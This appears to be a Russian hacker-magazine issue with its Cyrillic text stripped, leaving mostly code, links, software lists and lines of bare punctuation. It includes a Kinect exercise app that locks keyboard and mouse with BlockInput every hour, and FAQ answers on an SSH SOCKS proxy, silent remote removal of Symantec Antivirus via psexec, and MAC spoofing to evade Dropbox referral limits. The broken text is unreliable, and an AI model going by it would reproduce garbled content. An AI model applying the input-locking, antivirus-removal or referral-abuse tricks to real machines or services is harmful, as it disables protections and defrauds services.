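double topY = 0;                                   // Y coordinate of the upper line
double bottomY = 0;                                // Y coordinate of the lower line
int numOfBobs = 0;                                 // number of counted repetitions
bool bottomPosition, topPosition;                  // flags: lower and upper positions reached
Ellipse ellipse = new Ellipse                      // marker drawn at the user's neck
{
    Fill = new SolidColorBrush(Colors.AliceBlue),
    Width = 20, Height = 20
};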

:
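// Create the tracker from the OpenNI configuration file
_skeleton = new NuiUserTracker("SamplesConfig.xml");
// Subscribe to the event raised whenever the list of tracked users is updated
_skeleton.UsersUpdated +=
    new NuiUserTracker.UserListUpdatedHandler(Skeleton_UsersUpdated);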

NuiUserListEventArgs.Users
.
.
,
. .
, . : ,
.
( - ).
, , .
// Body of the Skeleton_UsersUpdated handler: process every tracked user
foreach (var user in e.Users) {
    // Calibrate once, on the first update with a valid neck position
    if ((topY == 0) && (user.Neck.Y != 0)) {
        // Upper reference line: neck Y + 20
        topY = user.Neck.Y + 20;
        Line topLine = new Line {
            Y1 = topY, X1 = 0, Y2 = topY, X2 = 662,
            Stroke = new SolidColorBrush(Colors.Red),
            StrokeThickness = 4 };
        LayoutRoot.Children.Add(topLine);
        // Lower reference line: torso Y + 20
        bottomY = user.Torso.Y + 20;
        Line bottomLine = new Line {
            Y1 = bottomY, X1 = 0, Y2 = bottomY, X2 = 662,
            Stroke = new SolidColorBrush(Colors.Blue),
            StrokeThickness = 4 };
        LayoutRoot.Children.Add(bottomLine);
        // Marker that follows the neck
        LayoutRoot.Children.Add(ellipse);
    }

, :
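    // Move the marker to the current neck position
    ellipse.Margin = new Thickness(user.Neck.X, user.Neck.Y, 0, 0);
    // Upper position reached
    if (user.Neck.Y + 5 < topY) topPosition = true;
    // Lower position reached
    if (user.Neck.Y + 25 > bottomY) bottomPosition = true;
    // Both positions reached: count one repetition and reset the flags
    if (topPosition && bottomPosition) {
        numOfBobs++;
        topPosition = false;
        bottomPosition = false;
    }
    // After 20 repetitions, close the application
    if (numOfBobs >= 20) {
        Application.Current.Shutdown();
    }
} // end of foreach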


. App.xaml.cs :
// Required for calling unmanaged Windows API functions (P/Invoke)
using System.Runtime.InteropServices;

.
Windows API BlockInput:
public partial class NativeMethods {
[System.Runtime.InteropServices.DllImportAttribute(
"user32.dll", EntryPoint = "BlockInput")]
[return: System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
public static extern bool BlockInput(
[System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
bool fBlockIt);
}

App.
xaml .

:
using System.Timers;

:
private static System.Timers.Timer TheTimer;

, , :
private void button1_Click(object sender, RoutedEventArgs e)
{
    // Timer interval: 3,600,000 ms (one hour)
    TheTimer = new System.Timers.Timer(3600000);
    // Call BlockPC each time the interval elapses
    TheTimer.Elapsed += new ElapsedEventHandler(BlockPC);
    TheTimer.Enabled = true;
}

:
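void BlockPC(object source, ElapsedEventArgs e) {
    // Elapsed is raised on a thread-pool thread; a WPF window must be created on the UI thread
    Application.Current.Dispatcher.Invoke(new System.Action(() => {
        App.NativeMethods.BlockInput(true); // block keyboard and mouse input
        MainWindow w = new MainWindow();    // open the tracking window
        w.Show();
    }));
}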


:
// Unblock keyboard and mouse input
App.NativeMethods.BlockInput(false);

- , ,
, .

, !
, ,
, .
, 3 4 ,
. 3d-, !

Kinect , ,
.
,
. : iRobot Create ,
Ubuntu ROS
, Kinect .
Willow Garage Turtlebot (willowgarage.com/turtlebot).
Bilibot (bilibot.com),
.
$1200.
. ,
PC, Asus WAVI Xtion. ,
, , ,
, ,
, . z
PHREAKING
(po@kumekay.com)

-
, . ,

.
.
,
, .

.
. ,
!

- .
made in China. eBay ,
. , , ,

. !
dealextreme.com, 50 000 . focalprice.com
kaidomain.com. buyincoins.com,
, .
, .
-, - (dealextreme.com/gift-ideas) .
paypal,
( Maestro Visa-Electron).
paypal.com ,
, .

ebay-forum.ru. .
,
. ,
!
DealExtreme , 12
. ,
, .
: dealextreme.com/details.dx/sku.35199 $19. stere amp,
, .

, , ,
.
, . mp3-,
usb- sdhc, ,
, , , .
! , .
mp3- .
, ,
, , .
, USB SD . ,
:
1. ;
2. ;
3. USB/SD;
4. ( );
5. /;
6. ( ).
. ,

.
,
: dealextreme.com/details.dx/sku.27987.
, , !
10 13 , 500-700 ,
.
, -
! -, ,
.
, .
( ),
.
12
s.dealextreme.com/search/EL+Strip. ,

( ),
. ,
,
, -
.
BMW- (dealextreme.com/p/25513).
, ,
-:
(dealextreme.com/p/43968), - , (dealextreme.com/p/44281),
12- , , .

, , . , .
, .
, ePad buyincoins.com/details/epad-7-touch-mid-notebookandroid-usb-enthernet-rj45-product-1851.html. ,
ARM- VIA VT8505
450 MHz ,
, . 7
( 800x480)
-
-.
, .
, 7" Dropad (dealextreme.com/p/71932)
Cortex A8
DJ- (market.android.com/details?id=com.beatronik.
djstudio), GPS
.

. , , ,
. EDGE
3G- .
, ,
, . Wi-Fi. USB 3G-
Wi-Fi . USB 3G- ,
,
( Huawei ZTE)
700-1000 . Wi-Fi ( USB-),
dd-wrt (dd-wrt.com)
3G- , , dealextreme.com/p/59040.
dealextreme.com/p/51797, ,
20 ,
. android Dropad,
USB- . android- 2.2, 3G Wi-Fi, , Barnacle
WiFi Tether (market.android.com/details?id=net.szym.barnacle).

,
- . mp3-, fm-, (dealextreme.com/p/625),
. ,
Bluetooth- (dealextreme.com/p/14956),
.

, .
,
,
. -

FM-
USB-

200
60
600
150
1000
60
500
90
70
150
90
530
200

300
4000

,
. -
. ,
35 /, . ,
,
7-12 / ,
. ,
, (dealextreme.com/p/ 71635)
. ,
, 3-4 .
:
(dealextreme.com/p/ 35190),

: NiCd, NiMH, LiIon, LiPo, LiFe , ,
-. ,
5 , ,
, ,
- .
12- . , . 12
2,1
5,5 , ,
. -
. .
,
:
5 : USB-,
, . , (dealextreme.com/p/58012)!
(dealextreme.com/p/34674).
microUSB, miniUSB, nokia, iPhone, SE, LG ..
1,5-12 : , 220
, , 6-9 .
, Wi-Fi ,
. (dealextreme.com/p/90021) .
12-24 : 19-20 , (dealextreme.com/p/3438).
.
220 : - ,
220 . , ,
,
100 . focalprice.com/ERK80S/100W_DC_12V_to_AC_220V_Power_Inverter_Kit_Silver.html.


. , .

,
.
:
1. , ,
.
2.
.
3. .
mp3

C
4. .
5. .
,
,
. ,
.
- ,
,
. ( ).

,
(
), .
,
.

,
( 50 ). ,
.
,
. ,
, . ,
,
, ,
! z

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q: , ,
?
A: , -
, Google
Analytics (www.google.com/analytics).
(
) .
,
. ,
, .

GA ( JS-,
-

Google),
_trackPageLoadTime(), _trackPageview():
// Asynchronous GA syntax:
_gaq.push(['_trackPageview']);
_gaq.push(['_trackPageLoadTime']);
// Traditional GA syntax:
pageTracker._trackPageview();
pageTracker._trackPageLoadTime();


.
,
.

Q: Windows
?
?
A: ,
,
Backup
Utility (code.google.com/p/backup-utility-4)
DataGrab (sites.google.com/a/obxcompguy.com/foolish-it/vb6-projects/datagrab), .

(
),

. , ,
,
exe-.

Q: SOCKS5-,
Linux.
A: , , , Linux-
:
ssh -N -D 0.0.0.0:1080 localhost

,
( -D) 1080 SOCKS4 SOCKS5 ( ,
SOCKS5-).
-N , idle- -
localhost.
ssh ,
-f. , .
,
iptables:

iptables -A INPUT --src 1.2.3.4 -p tcp --dport 1080 -j ACCEPT
iptables -A INPUT -p tcp --dport 1080 -j REJECT

Q:
- . ,
, ,
.
?
A: . IP- 1.2.3.4
Apple,
(WTF?!).
www.myfax.com/free.
, .

( 1080 ).
,
, ,

proxy-, Perl, TCP
SQLiteSpy
SQLite


proxy (github.com/pkrumins/perl-tcp-proxy).
IP-
( @allowed_ips). TCP proxy
SOCKS- , . SSH
-:
ssh -N -D 55555 localhost

SOCKS , ,
localhost.

Q: , (
) , Windows?
A:
Windows,
(SRP).
,
(GPO).
,
( ) ,

. ,
,

:
C:\Windows\explorer.exe
C:\Windows\System32\csrss.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\rdclip.exe
C:\Windows\System32\taskhost.exe
C:\Windows\System32\TSTheme.exe
C:\Windows\System32\userinit.exe


. :
1. (
mmc).
2.
.
3.
(GPO).
4. .
5. , ,
GPO.
6. .

< .
7. Windows



.
8. .
.
9.

.
,
.
10.
. ,
(,
%HKEY_LOCAL_MACHINE\...).
11. ,
,
,
.


, .

Q:
?
A: - ,
SQLite (www.sqlite.org),

.
SQLite
(
Mac OS iPhone OS, Android).
SQLite
sqlite3


PMD
GUI- SQLite Browser
(sqlitebrowser.sourceforge.net), SQLiteSpy
(www.yunqa.de/delphi/doku.php/products/sqlitespy/index) SQLite Manager
(addons.mozilla.org/ru/firefox/addon/sqlite-manager).
, SQLite,

(bit.ly/mCQlxA).

Q: ?
A: ,
:
$ python -m SimpleHTTPServer

8000 (
) -
(.. , ).
(
0.0.0.0). index.htm,

. ,
.
.
, Python
SimpleHTTPServer.
Python Linux-,
.

, .

Q:
?
A: ,
, .
,

Symantec Antivirus.

,

( , ).
(
),
,
.

. 300
?
, ,
.
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL ,
Symantec Antivirus.
{BA4B71D1-898E-4306-AE87-8BA7A596F0ED}.
UninstallString ,

MsiExec.exe.

,
.
- . ,
MsiExec.exe,
:
MsiExec.exe /norestart /q/x{BA4B71D1-898E-4306-AE87-8BA7A596F0ED} REMOVE=ALL

,

:
psexec \\computer_name MsiExec.exe /norestart /q/x{BA4B71D1-898E-4306-AE87-8BA7A596F0ED} REMOVE=ALL

,
,
, .

Q:
Dropbox,
? email
: -

.
A: , .
Dropbox-,
: .


. , Dropbox
MAC-.
, 250 Dropbox,
:
1. email.
2. , .
Linux Mac-
ifconfig,
Technitium MAC Address Changer v5 Release 3
(www.technitium.com). ,
, -

Dropbox
(habrahabr.ru/blogs/services/120526).


?
A: , , ,

Q: , ?
JavaScript ,
HTML- ( )
DOM.
?
A: :

PowerShell (
Windows 7 Windows Server 2008 R2).
:
1. System.IO.FileSystemWatcher
:


? , ,

(sreznikov.blogspot.com). , ,
. ,
String supplant,
,
{}. ,
,
,
.

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = $searchPath
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true

String.prototype.supplant =
function(o) {
return this.replace(/{([^{}]*)}/g,
function(a, b) {
var r = o[b];
return typeof r === 'string' ||
typeof r === 'number' ? r : a;
}
);
};

. :
var data = {
url: '/test/',
thumb_src: 'test.gif',
thumb_width: 60,
thumb_height: 30,
caption: '-!'
};

supplant,
:
var template = '<div class="preview">' +
    '<p class="image"><a href="{url}">' +
    '<img src="{thumb_src}" width="{thumb_width}" height="{thumb_height}"/></a></p>' +
    '<p class="caption">{caption}</p></div>';
var result = template.supplant(data);

, ,
(createElement)
(appendChild) DOM.

Q: , API,

.Path , .
.IncludeSubdirectories
.
2. ,
, $watcher
.
:
$changed = Register-ObjectEvent $watcher "Changed" -Action {
    Write-Host "Changed: $($eventArgs.FullPath)"
}


, .
, .
3. , Powershell, :
# $changed is the event job; its Name is the subscription's source identifier
Unregister-Event -SourceIdentifier $changed.Name

,
PowerShell,
. PowerGUI (www.powergui.org) ,
.

Q: ?
: PE-,
?
,
:).
A: .
Process Memory Dumper (evilfingers.com/tools//ProcessMemoryDumper.php),

PMD. GUI-,

DumpedProcess.dmp,

. z
>Net
ApacheConf Lite 7.1
DragonDisk for Windows 0.8.1
DU Meter 5
Firewall Builder 4.2.2
Gladinet Cloud Desktop Starter
Edition 3.2
Host Profiles 1.0
Htpasswd Generator 4.1.1
inSSIDer 2.0.7

>Multimedia
FinePrint 6.20
ImgBurn 2.5.5.0
IsoBuster 2.8.5
Kindle for PC 1.5.0
Nemo Documents
Oxelon Media Converter 1.1
pdfFactory 4.10
SumatraPDF 1.6
VidCoder 0.9.2
Virtual CloneDrive 5.4.5.0
VirtualDub 1.9.11

>Misc
allsnap v1.50beta
AtomicDic 0.2.1
AutoHotkey_L
Bins
Chameleon Window Manager
1.1.0.126
ClipX 1.0.3.9 beta 7 x86
DropIt 2.6
Free Opener 1.0
Handy Shortcuts
Hot Corners 2.2.2.0
JumpPad 2.1
Launch 2.6 Beta2
MouseExtender 1.9.9.3
NTFS Permissions Tools 0.9.9
QTTabBar 1.2.2.1
SmartGUI Creator 4.0
Switcher 2.0.0
Synergy 1.4.2 beta
Taskbar Shuffle 2.5
TrayScript 1.0
TreeSize Free V2.51

>MAC
Book Hunter 1.1.10
Breakaway 2.0
CocoaPacketAnalyzer 0.72
DVD Hunter 1.1.10
Mactracker 6.0.2
Meteorologist 1.5.5
Neuronyx 2.4.5
Nocturne 2.0
Quicksilver 60
Roccat Browser 1.5
ShellBar 1.0
SoundCloud 1.1.0
Spotify 0.5.1.98
SunFlower 0.13
TeamViewer 6.0
Visor 1.9
VLC 1.1.10
VUWER 1.4.6
WireShark 1.6.0

>System
Dependency Walker 2.2
EASIS Drive Check
KeePass 2.15
Listary
Locate32 3.0.7
Master Commander 1.0.1
McAfee ShareScan
Menu Uninstaller 1.2.1
MiniTool Power Data Recovery Free
Edition 6.5
NexusFile 5.3.1
RegASSASSIN
SandboxDiff 2.3
Service monitor
StressMyPC 1.01
SuperF4 1.2
TrayStatus 1.2.3
TrueCrypt 7.0a
USB Disks Access Manager 1.0

>Security
BurpSuite 1.4
DirectoryScanner 1.0
DOMinator
EchoMirage 1-2
Enhanced Mitigation Experience
Toolkit v2.1
Microsoft Web Application
Configuration Analyzer v2.0
nuf-fuzzer
PANBuster v1.0
peepdf 0.1
rkanalyzer
SiteDigger v3.0
w3af 1.0
yara-project 1.5
YETI

Odysseus-2-0-0-84
Pidgin OTR 3.2.0
Psi 0.14
RoboForm Everywhere v7.3.2
WinSCP 4.3.3

>Net
Firefox 4.0.1
Google Chrome 12
gWakeOnLan 0.5.1
IGMPproxy 0.1
ipvs 1.2.1
KVIrc 4.0.2

>System
Bacula 5.0.3
Glibc 2.14
GNU Parted 3.0
Grub 1.99
HDFS 0.21.0
Heartbeat 2.1.4
Libertine 5.0
Linux Kernel 2.6.39.1
Redis 2.2.8
Sentinella 0.9.0
Slony-1 2.0.6
Syslog-ng 3.2.4

>Games
Warzone 2100 2.3.8

>Devel
Flot 0.7
GiNaC 1.6.0
Google Web Toolkit 2.3
Memcached 1.4.5
Nemerle 1.0
Nodejs 0.4.8
Netty 3.2.4
NumPy 1.6.0
Perl 5.14
phpMyAdmin 3.4.0
Prettify
Qwt 6.0.0
Scala 2.9.0.1
Scala IDE
Tcc 0.9.25
Thrift 0.6.1
Twisted 11.0.0
XCache 1.3.2

>>UNIX
>Desktop
AbiWord 2.8.6
Floola 2011r3
Fontmatrix 0.6.0
FreeArc 0.666
Frinika 0.5.1
gLabels 3.0.0
Gramps 3.2.6
keyTouch 2.4.1
Launchy 2.5
LuxRender 0.8
Metromap 0.1.3
PiTiVi 0.14
QSapecNG 1.2.2
Remuco 0.9.5
Sage 4.7
SimpleBurn 1.6.2.1
soundKonverter 1.0.0
Workrave 1.9.4

>>
""

>X-Distr
BackTrack 5

>Server
Apache 2.2.19
Berkeley DB 5.1.25
BIND 9.8.0
CUPS 1.4.6
DHCP 4.2.1
FlockDB 1.8.0
JBossAS 6.0.0
Lucene 3.2
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.3
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.5
Squid 3.1.12
Tomcat 7.0.4

>Security
Burp Suite 1.4
EAPeak 0.1.0
Fimap 0.9
Ghost-Phisher 1.1
Iptables 1.4.11.1
Metasploit Framework 3.7.1
Ncrack 0.04a
Portsentry 1.2
Pytbull 1.1
Radare2 0.7
RIPS 0.40
SIPVicious 0.2.6
Skipfish 1.91
Sniffjoke 0.4.1
w3af 1.0
Wireshark 1.6.0
Xplico 0.6.3
Zed Attack Proxy 1.3.0

Opera 11.11
PgBouncer 1.4.1
qBittorrent 2.8
SeaMonkey 2.0.14
SIM 0.9.4.3
SPGT 0.1
Subsonic 4.4
Tcpdump 4.1.1
Thunderbird 3.1
Transmission 2.31
Udpxy 1.0
XChat 2.8.9

>>WINDOWS
>Development
API Monitor v2 (Alpha-r7)
AsmJit 0.8.6
AsmJit 1.0beta2
Beyond Compare 3
Easy Query Builder
Git 1.7.4
intype 0.3.1
Mercurial 1.8.4
SQLite Manager 0.7.4
SQLite Precompiled Binaries For
Windows
SQLiteSpy 1.9.0
SQLyog Community Edition - 9.10
Titanium Studio Release Candidate 1
XML Notepad 2007
UNITS

HTTP://WWW2

MINUS
min.us

PAGE2RSS
page2rss.com

-,

. Dropbox Public
. min.us ,
. ( Windows, Mac, Linux)

dragndrop, ,
. (Android, iOS, WP7),
.

RSS-,
, ,
- RSS-.
, ? Google Reader
( RSS- Google) ,
RSS-. ,
RSS-, .

page2rss. ,
.

VISUALLAND
visualland.net

PILOTHANDWRITING
pilothandwriting.com

ARP, DNS, DHCP, ICMP


.. , ,
, ,
RFC . visualland.

. . , : ,
, ,
. : bit.ly/Jasper_here.

,
. A4,
.
-
. ,
PilotHandwriting .
, ,
.

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

X 10 /141/ 10